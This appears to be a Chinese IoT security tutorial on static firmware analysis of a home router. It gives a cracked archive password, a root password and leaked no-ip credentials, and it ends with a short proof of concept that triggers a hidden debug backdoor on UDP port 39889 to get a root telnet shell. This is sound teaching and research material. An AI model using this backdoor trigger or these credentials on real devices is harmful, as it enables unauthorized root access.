物聯網IoT安全教程(二) 靜態分析IoT韌體

2021-10-02 00:04:26 字數 2381 閱讀 4794

ps:本文所用到的程式見 –

得到韌體後,若直接開啟,會發現該韌體被加了密,無法直接解壓縮,這是廠商對該韌體做了保護,防止大家逆向分析他的韌體。

通過frackzip工具可以破解該zip的密碼,時間要挺久的,我直接告訴你吧,密碼是beut9z。

解壓後發現資料夾中有多個.yaffs2字尾的檔案,這些都是韌體的檔案。

yaffs2裡有幾個看上去是recovery的映象,核心的應該是2k-mdm-image-mdm9625.yaffs2 ,我們下面就來提取該檔案,我首先用binwalk來提取它,但提取出來的檔案亂七八糟,不知道什麼原因,後來看網上推薦直接用yaffs的原生工具unyaffs提取,就可以了,檔案系統清晰明了。

接下來我們查詢該路徑下的所有.conf檔案,.conf檔案多是配置檔案,有可能從中可以發現敏感的資訊。

其中的inadyn-mt.conf檔案引起了我們注意,這是no-ip應用的配置檔案,no-ip就是乙個相當於花生殼的東西,可以申請動態網域名稱。我們從中可以發現洩露的no-ip的登陸賬號及密碼。

除了上述洩露的no-ip賬號密碼,我們還從shadow檔案中找到了root賬號的密碼,通過爆破可以得到root的密碼為1234。

其實並不止有.conf檔案會洩露資訊,還有很多其他字尾的敏感檔案會洩露資訊,我們接下來使用firmwalker工具來自動化遍歷該韌體系統中的所有可疑檔案。

命令如下,firmwalker會將結果儲存到firmwalker.txt。

看了下該工具的原始碼,沒啥亮點,就是遍歷各種字尾的檔案。

字尾都在data資料夾中的各個配置檔案中。

通過ida進行反編譯,在main函式中發現了乙個管理員當時為了方便除錯留下的後門,只要連線該韌體的39889埠並傳送helodbg的字串,就可以進行遠端執行命令。

poc如下:

user@kali:~$ echo -ne "helodbg" | nc -u 192.168.1.1 39889 

hello

^c user@kali:~$ telnet 192.168.1.1

trying 192.168.1.1...

connected to 192.168.1.1. escape character is '^]'.

openembedded linux homerouter.cpe

msm 20141210 homerouter.cpe

/ #

id uid=0(root) gid=0(root)

/ #

exit

connection closed by foreign host.

user@kali:~$

除了以上這些,該韌體還存在多個漏洞,詳細的報告請看這~

《物聯網安全基礎》筆記二

演算法的核心技術是設計無碰撞的壓縮函式f,由於f是由若干輪處理過程組成的,所以對f的攻擊需要對各輪之間的位模式的分析來進行,常需要先找出f的碰撞 sha目前有5種演算法,sha1,sha224,sha256,sha284,sha512,後四者有時並稱為sha2 cbc mac是一種經典的構造mac的...

為什麼網路安全對物聯網(IoT)很重要

物聯網和連線裝置的持續增長 gartner 到2020年結束,全球將使用204億個連線物 導致資料呈指數級增長 有望使家電更智慧型,過程更高效,生活更輕鬆。儘管這種大規模生成和收集資料肯定有很大的好處,但輕鬆訪問資料也帶來了更多的漏洞 不安全的iot裝置給個人和公司資訊帶來了嚴重的風險。出於多種原因...

IoT 一 物聯網平台架構設計分析

裝置管理 裝置管理定義裝置相關資訊,每個裝置必須定義其裝置型別,裝置型別有使用者屬性,裝置在完成銷售,並被使用者啟用後裝置就屬於裝置使用者了,這時候裝置使用者對裝置有完全的控制權,可以控制裝置的哪些資料可以被製造商檢視,可以被哪些使用者檢視等許可權 使用者管理 使用者是基於乙個組織下的人員構成,每個...